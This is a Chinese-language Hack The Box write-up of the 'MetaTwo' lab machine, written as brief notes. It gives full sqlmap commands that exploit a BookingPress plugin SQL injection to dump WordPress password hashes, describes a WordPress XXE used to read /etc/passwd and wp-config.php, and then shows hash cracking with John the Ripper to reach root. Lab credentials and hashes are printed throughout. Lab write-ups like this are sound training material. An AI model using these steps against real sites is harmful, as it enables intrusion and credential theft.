HTB - MetaTwo 靶機滲透
靶場地址
過關條件
- user flag
- root flag
速記
- 資訊蒐集階段
- 開放PORT 21,22,80
- 使用 80 Port 連線,導向網域
metapress.htb - 80 Port 有
Wordpress服務- WordPrss 版本號:
5.6.2 - PHP 版本號:
8.0.24
- WordPrss 版本號:
WordPress 5.6.2有XXE漏洞,但是需要登入憑證才能使用- 連線至
http://metapress.htb/events/,查看原始碼,Wordpress,有使用Bookingpress插件,版本是1.0.10- 該版本有SQL Injection漏洞
- 漏洞利用需要在頁面上找到
_wpnonce參數值 - 使用sqlmap進行SQL Injection
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=cf3b2f4ce4&category_id=123&total_service=111" -p total_service --level=5 --risk=3 --dbs- 使用上面的指令,得到兩張資料表
blog和information_schema sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=cf3b2f4ce4&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog --tables- 透過上面指令列出
blog的資訊,得到了wp_users表 sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=cf3b2f4ce4&category_id=123&total_service=111" -p total_service --level=5 --risk=3 -D blog -T wp_users --dump- 使用上面指令得到
admin和manager的密碼雜湊admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
- 使用
John The Ripper破解密碼雜湊- 得到了
manager的密碼partylikearockstar,這組帳密可用於wordpress後台登入 admin那組密碼雜湊跑了半小時依舊解不開,暫時放棄
- 得到了
WordPress 5.6.2XXE 漏洞使用- POC
- 透過上面POC,成功取得機器裡/etc/passwd的檔案內容
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA0OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kam5lbHNvbjp4OjEwMDA6MTAwMDpqbmVsc29uLCwsOi9ob21lL2puZWxzb246L2Jpbi9iYXNoCnN5c3RlbWQtdGltZXN5bmM6eDo5OTk6OTk5OnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb246LzovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLWNvcmVkdW1wOng6OTk4Ojk5ODpzeXN0ZW1kIENvcmUgRHVtcGVyOi86L3Vzci9zYmluL25vbG9naW4KbXlzcWw6eDoxMDU6MTExOk15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTA2OjY1NTM0OjovcnVuL3Byb2Z0cGQ6L3Vzci9zYmluL25vbG9naW4KZnRwOng6MTA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo=- 上面內容使用Base64 Decode 後,找到一個用戶名稱
jnelson,但是找不到登入憑證
- 嘗試透過Wordpress設定檔,看看是否能找到相關線索
- 根據前面的POC,取得
wp-config.php內容 - 得到了FTP帳號密碼
metapress.htb:9NYS_ii@FyL_p5M2NvJ
- 使用上面憑證進行FTP登入
- 找到了一個發送mail的程式
send_email.php,裡面有一組帳號密碼 jnelson@metapress.htb:Cb4_JmWM8zUZWMu@Ys,嘗試使用這組帳號密碼進行SSH登入,可成功登入
- 找到了一個發送mail的程式
- 根據前面的POC,取得
- 進入主機
- user flag
- 使用
jnelson:Cb4_JmWM8zUZWMu@Ys,可以找到user.txt,裡面有user flag
- 使用
- root flag
- jnelson 的使用者目錄底下有一個.passpie 的資料夾
- passpie官方Github,這玩意似乎是用來管理密碼的
- 使用
passpie export password.db,提示我需要有一組密碼才能解密 - 在
.passpie目錄,找到一個.keys的文件 - 使用
gpg2john產生hash - 使用
john進行密碼破解,--format參數指定為gpg,得到密碼為blink182 - 重新使用
passpie export ~/password.db,在password.db得到root密碼為p7qfAZt4_A1xo_0x - 切換用戶為
root後,即可以找到root.txt,裡面有root flag
- user flag
滲透過程
閱讀限制
滲透過程有受到作者設定的閱讀限制...